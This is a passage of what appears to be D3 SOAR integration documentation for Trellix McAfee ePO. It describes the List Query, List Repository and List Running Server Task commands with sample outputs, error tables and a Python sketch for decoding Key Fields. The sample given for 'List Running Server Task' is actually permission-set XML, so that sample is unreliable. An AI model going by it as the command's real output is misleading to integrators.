| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| 1 | Effective permissions for users | Shows all permissions for each user | Permission Does not equal ";%%NOEPOROLES%%"; | Permissions | Public | | EntitlementView | admin | 2/14/2018 1:00:39 PM | admin | 2/14/2018 1:00:39 PM |
| 2 | Permission set details | Shows the permissions associated with each permission set | | Permissions | Public | | EntitlementView | admin | 2/14/2018 1:00:41 PM | admin | 2/14/2018 1:00:41 PM |
| 3 | Permission set membership | Shows the permission sets associated with each principal | | Permissions | Public | | EntitlementView | admin | 2/14/2018 1:00:41 PM | admin | 2/14/2018 1:00:41 PM |
| 4 | Failed User Actions in ePO Console within Last 30 Days | Displays a table of all failed actions within the last 30 days from the Audit Log. | (Success Equals False and Start Time Is within the last 1 Months) | User Auditing | Public | | OrionAuditLog | admin | 2/14/2018 1:04:19 PM | admin | 2/14/2018 1:04:19 PM |
| 5 | Today's Detections per Product | Displays a pie chart of detections within the last 24 hours organized by detecting product. | (Event Generated Time Is within the last 1 Days and Event Category Does not belong to Operational) | Detections and Compliance | Public | | EPOEvents | admin | 2/14/2018 1:04:19 PM | admin | 2/14/2018 1:04:19 PM |
| 6 | Systems per Top-Level Group | Displays a bar chart of your managed systems organized by top-level System Tree group. | Managed State Equals Managed | System Management | Public | | EPOLeafNode | admin | 5/23/2019 8:54:41 PM | admin | 5/23/2019 8:54:41 PM |
| 7 | Duplicate Systems Names | Lists all system names that appear in multiple System Tree locations. | System Name Is duplicated | System Management | Public | | EPOLeafNode | admin | 2/14/2018 1:04:20 PM | admin | 2/14/2018 1:04:20 PM |
| 8 | McAfee Agent Compliance Summary | Displays a Boolean pie chart of managed systems in your environment which are compliant or noncompliant by version of McAfee Agent. | Last Communication Is within the last 1 Days | Detections and Compliance | Public | | EPOLeafNode | admin | 5/23/2019 8:54:40 PM | admin | 5/23/2019 8:54:40 PM |

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
| --- | --- | --- |
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | List Query failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 401. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Unauthorized. |

Error Sample Data

List Query failed.

Status Code: 401.

Message: Unauthorized.

List Repository

Retrieves a list of all repositories.

Input

N/A

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "SAServerDNS": "",
        "disableV1DATReplication": false,
        "spipeServerDNS": null,
        "repositoryTypeString": "master",
        "useAnonCreds": false,
        "downloadCredPassword": "",
        "downloadCredDomain": "",
        "lockType": 0,
        "enabled": true,
        "uncUseLoggedOnUser": false,
        "uncOrder": "1",
        "protocol": 1,
        "lockedBy": "",
        "softwareInclusionList": [],
        "uploadCredUsername": "",
        "spipeVersion": "4.5.0",
        "SAServerNetbios": "",
        "protocolString": "SpipeSite",
        "disableFullDATReplication": false,
        "replicationUNC": "",
        "SAServerIP": "",
        "addressType": null,
        "autoID": 3,
        "softwareExclusionList": null,
        "repositoryTypeAsString": null,
        "repositoryName": "*****-AD",
        "spipeServerName": "*****-AD",
        "uploadCredDomain": "",
        "repositoryPort": *****,
        "downloadPasswordEncrypted": true,
        "httpUseAuth": false,
        "downloadCredUsername": "",
        "includeAllSoftware": true,
        "repositoryId": "*****-AD",
        "repositoryType": 2,
        "location": "D3Lab-AD/Software",
        "updateExclusionList": true,
        "spipeServerIP": "1.1.1.1",
        "uploadCredPassword": "",
        "fallback": false,
        "repliPasswordEncrypted": true
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "SAServerDNS": "",
        "disableV1DATReplication": false,
        "spipeServerDNS": null,
        "repositoryTypeString": "master",
        "useAnonCreds": false,
        "downloadCredPassword": "",
        "downloadCredDomain": "",
        "lockType": 0,
        "enabled": true,
        "uncUseLoggedOnUser": false,
        "uncOrder": "1",
        "protocol": 1,
        "lockedBy": "",
        "softwareInclusionList": [],
        "uploadCredUsername": "",
        "spipeVersion": "4.5.0",
        "SAServerNetbios": "",
        "protocolString": "SpipeSite",
        "disableFullDATReplication": false,
        "replicationUNC": "",
        "SAServerIP": "",
        "addressType": null,
        "autoID": 3,
        "softwareExclusionList": null,
        "repositoryTypeAsString": null,
        "repositoryName": "*****-AD",
        "spipeServerName": "*****-AD",
        "uploadCredDomain": "",
        "repositoryPort": 80,
        "downloadPasswordEncrypted": true,
        "httpUseAuth": false,
        "downloadCredUsername": "",
        "includeAllSoftware": true,
        "repositoryId": "*****-AD",
        "repositoryType": 2,
        "location": "D3Lab-AD/Software",
        "updateExclusionList": true,
        "spipeServerIP": "1.1.1.1",
        "uploadCredPassword": "",
        "fallback": false,
        "repliPasswordEncrypted": true
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"[\\r\\n    {\\r\\n        \\\"SAServerDNS\\\": \\\"\\\",\\r\\n        \\\"disableV1DATReplication\\\": false,\\r\\n        \\\"spipeServerDNS\\\": null,\\r\\n        \\\"repositoryTypeString\\\": \\\"master\\\",\\r\\n        \\\"useAnonCreds\\\": false,\\r\\n        \\\"downloadCredPassword\\\": \\\"\\\",\\r\\n        \\\"downloadCredDomain\\\": \\\"\\\",\\r\\n        \\\"lockType\\\": 0,\\r\\n        \\\"enabled\\\": true,\\r\\n        \\\"uncUseLoggedOnUser\\\": false,\\r\\n        \\\"uncOrder\\\": \\\"1\\\",\\r\\n        \\\"protocol\\\": 1,\\r\\n        \\\"lockedBy\\\": \\\"\\\",\\r\\n        \\\"softwareInclusionList\\\": [],\\r\\n        \\\"uploadCredUsername\\\": \\\"\\\",\\r\\n        \\\"spipeVersion\\\": \\\"4.5.0\\\",\\r\\n        \\\"SAServerNetbios\\\": \\\"\\\",\\r\\n        \\\"protocolString\\\": \\\"SpipeSite\\\",\\r\\n        \\\"disableFullDATReplication\\\": false,\\r\\n        \\\"replicationUNC\\\": \\\"\\\",\\r\\n        \\\"SAServerIP\\\": \\\"\\\",\\r\\n        \\\"addressType\\\": null,\\r\\n        \\\"autoID\\\": 3,\\r\\n        \\\"softwareExclusionList\\\": null,\\r\\n        \\\"repositoryTypeAsString\\\": null,\\r\\n        \\\"repositoryName\\\": \\\"ePO_McAfeeEPO510\\\",\\r\\n        \\\"spipeServerName\\\": \\\"McAfeeEPO510\\\",\\r\\n        \\\"uploadCredDomain\\\": \\\"\\\",\\r\\n        \\\"repositoryPort\\\": 80,\\r\\n        \\\"downloadPasswordEncrypted\\\": true,\\r\\n        \\\"httpUseAuth\\\": false,\\r\\n        \\\"downloadCredUsername\\\": \\\"\\\",\\r\\n        \\\"includeAllSoftware\\\": true,\\r\\n        \\\"repositoryId\\\": \\\"ePO_McAfeeEPO510\\\",\\r\\n        \\\"repositoryType\\\": 2,\\r\\n        \\\"location\\\": \\\"McAfeeEPO510/Software\\\",\\r\\n        \\\"updateExclusionList\\\": true,\\r\\n        \\\"spipeServerIP\\\": \\\"192.168.87.109\\\",\\r\\n        \\\"uploadCredPassword\\\": \\\"\\\",\\r\\n        \\\"fallback\\\": false,\\r\\n        \\\"repliPasswordEncrypted\\\": 
true\\r\\n    }\\r\\n]\"",
    "disableV1DATReplication": "\"[\\r\\n \\r\\n  false\\r\\n \\r\\n ]\"",
    "location": "\"[\\r\\n \\r\\n  \\\"*****-AD/Software\\\"\\r\\n \\r\\n ]\"",
    "protocolString": "\"[\\r\\n \\r\\n  \\\"SpipeSite\\\"\\r\\n \\r\\n ]\"",
    "repositoryId": "\"[\\r\\n \\r\\n  \\\"*****-AD\\\"\\r\\n \\r\\n ]\"",
    "repositoryName": "\"[\\r\\n \\r\\n  \\\"*****-AD\\\"\\r\\n \\r\\n ]\"",
    "repositoryPort": "\"[\\r\\n \\r\\n  80\\r\\n \\r\\n ]\"",
    "repositoryType": "\"[\\r\\n \\r\\n  2\\r\\n \\r\\n ]\"",
    "spipeServerIP": "\"[\\r\\n \\r\\n  \\\"1.1.1.1\\\"\\r\\n \\r\\n ]\"",
    "spipeServerName": "\"[\\r\\n \\r\\n  \\\"*****-AD\\\"\\r\\n \\r\\n ]\"",
    "spipeVersion": "\"[\\r\\n \\r\\n  \\\"4.5.0\\\"\\r\\n \\r\\n ]\""
}
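
Each Key Fields value above is a JSON array that has been serialized to text and then JSON-encoded a second time, so a playbook step must unwrap it before using it as a task input. The following Python sketch is an added example, not D3 or Trellix code: `unwrap`, `decode_key_fields` and `valid_ips` are hypothetical helper names, and the embedded sample is constructed in the shape shown above, with one deliberately damaged entry.

```python
import ipaddress
import json

# Constructed sample in the same shape as the Key Fields block above.
# "spipeVersion" is deliberately damaged (its opening bracket is missing)
# to show that an undecodable value is reported instead of passed on.
SAMPLE_KEY_FIELDS = r'''{
    "protocolString": "\"[\\r\\n \\r\\n  \\\"SpipeSite\\\"\\r\\n \\r\\n ]\"",
    "repositoryPort": "\"[\\r\\n \\r\\n  80\\r\\n \\r\\n ]\"",
    "spipeServerIP": "\"[\\r\\n \\r\\n  \\\"1.1.1.1\\\"\\r\\n \\r\\n ]\"",
    "spipeVersion": "\"\\\"4.5.0\\\"\\r\\n \\r\\n ]\""
}'''


def _looks_wrapped(text):
    """True if the text starts like a JSON string, array or object."""
    return text.strip()[:1] in ('"', '[', '{')


def unwrap(value, max_depth=4):
    """Peel nested JSON encodings off one Key Fields value.

    Returns (decoded, ok). ok is False when a layer that looks like JSON
    fails to parse, or when the value is still wrapped after max_depth layers.
    Plain scalars such as "4.5" are left alone so they are not coerced
    into numbers.
    """
    current = value
    for _ in range(max_depth):
        if not isinstance(current, str) or not _looks_wrapped(current):
            return current, True
        try:
            current = json.loads(current.strip())
        except json.JSONDecodeError:
            return current, False
    still_wrapped = isinstance(current, str) and _looks_wrapped(current)
    return current, not still_wrapped


def decode_key_fields(raw_json):
    """Decode a Key Fields document into {name: list_of_values}.

    Returns (fields, rejected); rejected lists the names whose values
    could not be decoded and were therefore left out of fields.
    """
    outer = json.loads(raw_json)
    if not isinstance(outer, dict):
        raise ValueError("Key Fields document must be a JSON object")
    fields, rejected = {}, []
    for name, wrapped in outer.items():
        value, ok = unwrap(wrapped)
        if not ok:
            rejected.append(name)
            continue
        fields[name] = value if isinstance(value, list) else [value]
    return fields, rejected


def valid_ips(values):
    """Keep only string entries that parse as IPv4 or IPv6 addresses."""
    result = []
    for item in values:
        if not isinstance(item, str):
            continue  # ip_address() would accept integers; reject them here
        try:
            result.append(str(ipaddress.ip_address(item.strip())))
        except ValueError:
            continue
    return result


if __name__ == "__main__":
    fields, rejected = decode_key_fields(SAMPLE_KEY_FIELDS)
    print("decoded:", fields)
    print("rejected:", rejected)
    print("usable IPs:", valid_ips(fields.get("spipeServerIP", [])))
```

Checking the type of every decoded value (for example with `valid_ips`) before it reaches a later command keeps a malformed or unexpected field from being used as an address or identifier.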
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

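| SAServerDNS | disableV1DATReplication | spipeServerDNS | repositoryTypeString | useAnonCreds | downloadCredPassword | downloadCredDomain | lockType | enabled | uncUseLoggedOnUser | uncOrder | protocol | lockedBy | softwareInclusionList | uploadCredUsername | spipeVersion | SAServerNetbios | protocolString | disableFullDATReplication | replicationUNC | SAServerIP | addressType | autoID | softwareExclusionList | repositoryTypeAsString | repositoryName | spipeServerName | uploadCredDomain | repositoryPort | downloadPasswordEncrypted | httpUseAuth | downloadCredUsername | includeAllSoftware | repositoryId | repositoryType | location | updateExclusionList | spipeServerIP | uploadCredPassword | fallback | repliPasswordEncrypted |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| | False | | master | False | | | 0 | True | False | 1 | 1 | | [] | | 4.5.0 | | SpipeSite | False | | | | 3 | | | ***-AD | ***-AD | | 80 | True | False | | True | ***-AD | 2 | ***-AD/Software | True | 1.1.1.1 | | False | True |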

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
| --- | --- | --- |
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | List Repository failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 401. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Unauthorized. |

Error Sample Data

List Repository failed.

Status Code: 401.

Message: Unauthorized.

List Running Server Task

Retrieves a list of running server tasks.

Input

N/A

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
"<list id=""1"">  <permissionSet id=""2"">
		    <name>Group Admin</name>
		    <roles>
		      <role>
		        <roleUri>role:repoRole.masterViewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.view.tree</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.addressbook.admin</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.dash.user</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.modify.tree</roleUri>
		      </role>
		      <role>
		        <roleUri>role:response.rule.admin</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.productevents.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:scheduler.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:notes.fullPerms</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.deploy.agent</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.audit.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.event.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.wakeup.agent</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.tag.assign</roleUri>
		      </role>
		      <role>
		        <roleUri>role:notes.overRide</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.tagcat.user</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.query.user</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ubpRole.viewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ahRole.viewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:repoRole.distViewOnly</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""3"">
		    <name>Group Reviewer</name>
		    <roles>
		      <role>
		        <roleUri>role:core.addressbook.guest</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.dash.viewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.productevents.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:scheduler.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.event.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:notes.viewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.query.guest</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.view.tree</roleUri>
		      </role>
		      <role>
		        <roleUri>role:response.rule.user</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""4"">
		    <name>Executive Reviewer</name>
		    <roles>
		      <role>
		        <roleUri>role:epo.productevents.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.query.guest</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.dir.access</roleUri>
		        <customRoleInfo roleFactoryId=""epo.dir"">
		          <systems>
		            <system>\</system>
		          </systems>
		        </customRoleInfo>
		      </role>
		      <role>
		        <roleUri>role:core.dash.viewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.addressbook.guest</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.event.view</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""5"">
		    <name>Group McAfee Investigator FW</name>
		    <roles>
		      <role>
		        <roleUri>role:copperfieldFw.write</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""6"">
		    <name>MCP Catalog Admin</name>
		    <roles>
		      <role>
		        <roleUri>role:MCPSRVER1000.MCPSRVER1000.admin</roleUri>
		      </role>
		      <role>
		        <roleUri>role:common.catalog.data.general?catalogId=15e08086-c60e-4a69-93e4-a3be38b455f9&amp;itemTypeId8=perm.EDIT&amp;itemTypeId102=perm.EDIT&amp;itemTypeId201=perm.EDIT&amp;itemTypeId20=perm.EDIT</roleUri>
		      </role>
		      <role>
		        <roleUri>role:common.catalog.data.general?catalogId=00000000-0000-0000-0000-000000000000&amp;itemTypeId8=perm.EDIT&amp;itemTypeId102=perm.EDIT&amp;itemTypeId201=perm.EDIT&amp;itemTypeId20=perm.EDIT</roleUri>
		      </role>
		      <role>
		        <roleUri>role:common.catalog.actions.general?exportFile=&amp;importFromCatalog=&amp;createCatalog=&amp;deleteCatalog=&amp;importFromFile=</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""7"">
		    <name>Group Active Response Editor</name>
		    <roles>
		      <role>
		        <roleUri>role:mar-server.collectorRole.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.triggerRole.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.searchRole.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:MARCOBA_META.MARCOBA_META.admin</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.reactionRole.write</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""8"">
		    <name>Group Active Response Responder</name>
		    <roles>
		      <role>
		        <roleUri>role:MARCOBA_META.MARCOBA_META.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.reactionRole.read</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.collectorRole.read</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.triggerRole.read</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.searchRole.write</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""9"">
		    <name>Group Active Response Workspace Monitor</name>
		    <roles>
		      <role>
		        <roleUri>role:mar-server.searchRole.read</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-workspace.workspace.read</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.collectorRole.read</roleUri>
		      </role>
		      <role>
		        <roleUri>role:tie.viewer</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""10"">
		    <name>Group Active Response Workspace Responder</name>
		    <roles>
		      <role>
		        <roleUri>role:mar-server.reactionRole.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:tie.manager</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.collectorRole.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.triggerRole.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-workspace.workspace.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.searchRole.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.reactionRole.run</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""11"">
		    <name>Global Reviewer</name>
		    <roles>
		      <role>
		        <roleUri>role:ENDP_FW_META.ENDP_FW_META_FW.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:EPOAGENTMETA.tasks.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:MVEDR___META.MVEDR___META.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:DLPPS___1000.DLPPS___1000.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.view.tree</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.dash.viewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:MVEDR___META.tasks.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:MARCOBA_META.MARCOBA_META.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:response.rule.admin</roleUri>
		      </role>
		      <role>
		        <roleUri>role:issue.auditor?type=issue.type.untyped</roleUri>
		      </role>
		      <role>
		        <roleUri>role:TIEMGMT_META.TIEMGMT_META.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:assessment.assessment.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:MARCOBA_META.tasks.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:DXLCLNT_META.DXLCLNT_META.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:softman.viewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ENDP_WP_1000.tasks.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ENDP_GS_1000.ENDP_GS_1000.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.dir.access</roleUri>
		        <customRoleInfo roleFactoryId=""epo.dir"">
		          <systems>
		            <system>\</system>
		          </systems>
		        </customRoleInfo>
		      </role>
		      <role>
		        <roleUri>role:ENDP_AM_1000.tasks.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:EPOAGENTMETA.EPOAGENTMETA.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ahRole.viewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:rs.user</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.audit.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:DXLBROKRMETA.DXLBROKRMETA.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.query.guest</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ENDP_AM_1000.ENDP_AM_1000.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:TIEClientMETA.TIEClientMETA.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:rollup.execute</roleUri>
		      </role>
		      <role>
		        <roleUri>role:UDLPSRVR2013.UDLPSRVR2013.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:TELEMTRY1000.TELEMTRY1000.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.addressbook.guest</roleUri>
		      </role>
		      <role>
		        <roleUri>role:MCPSRVER1000.MCPSRVER1000.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ENDP_WP_1000.ENDP_WP_1000.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.productevents.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ubpRole.viewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:repoRole.distViewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.event.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:notes.viewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:scheduler.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:repoRole.masterViewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ENDP_GS_1000.tasks.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:MCA_____1000.MCA_____1000.reviewer</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""12"">
		    <name>TestPermissonSets</name>
		    <roles>
		      <role>
		        <roleUri>role:response.rule.admin</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		</list>
		"
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
"<list id=""1"">  <permissionSet id=""2"">
		    <name>Group Admin</name>
		    <roles>
		      <role>
		        <roleUri>role:repoRole.masterViewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.view.tree</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.addressbook.admin</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.dash.user</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.modify.tree</roleUri>
		      </role>
		      <role>
		        <roleUri>role:response.rule.admin</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.productevents.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:scheduler.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:notes.fullPerms</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.deploy.agent</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.audit.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.event.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.wakeup.agent</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.tag.assign</roleUri>
		      </role>
		      <role>
		        <roleUri>role:notes.overRide</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.tagcat.user</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.query.user</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ubpRole.viewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ahRole.viewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:repoRole.distViewOnly</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""3"">
		    <name>Group Reviewer</name>
		    <roles>
		      <role>
		        <roleUri>role:core.addressbook.guest</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.dash.viewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.productevents.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:scheduler.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.event.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:notes.viewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.query.guest</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.view.tree</roleUri>
		      </role>
		      <role>
		        <roleUri>role:response.rule.user</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""4"">
		    <name>Executive Reviewer</name>
		    <roles>
		      <role>
		        <roleUri>role:epo.productevents.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.query.guest</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.dir.access</roleUri>
		        <customRoleInfo roleFactoryId=""epo.dir"">
		          <systems>
		            <system>\</system>
		          </systems>
		        </customRoleInfo>
		      </role>
		      <role>
		        <roleUri>role:core.dash.viewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.addressbook.guest</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.event.view</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""5"">
		    <name>Group McAfee Investigator FW</name>
		    <roles>
		      <role>
		        <roleUri>role:copperfieldFw.write</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""6"">
		    <name>MCP Catalog Admin</name>
		    <roles>
		      <role>
		        <roleUri>role:MCPSRVER1000.MCPSRVER1000.admin</roleUri>
		      </role>
		      <role>
		        <roleUri>role:common.catalog.data.general?catalogId=15e08086-c60e-4a69-93e4-a3be38b455f9&amp;itemTypeId8=perm.EDIT&amp;itemTypeId102=perm.EDIT&amp;itemTypeId201=perm.EDIT&amp;itemTypeId20=perm.EDIT</roleUri>
		      </role>
		      <role>
		        <roleUri>role:common.catalog.data.general?catalogId=00000000-0000-0000-0000-000000000000&amp;itemTypeId8=perm.EDIT&amp;itemTypeId102=perm.EDIT&amp;itemTypeId201=perm.EDIT&amp;itemTypeId20=perm.EDIT</roleUri>
		      </role>
		      <role>
		        <roleUri>role:common.catalog.actions.general?exportFile=&amp;importFromCatalog=&amp;createCatalog=&amp;deleteCatalog=&amp;importFromFile=</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""7"">
		    <name>Group Active Response Editor</name>
		    <roles>
		      <role>
		        <roleUri>role:mar-server.collectorRole.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.triggerRole.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.searchRole.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:MARCOBA_META.MARCOBA_META.admin</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.reactionRole.write</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""8"">
		    <name>Group Active Response Responder</name>
		    <roles>
		      <role>
		        <roleUri>role:MARCOBA_META.MARCOBA_META.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.reactionRole.read</roleUri>
		      </role>
		      <role>
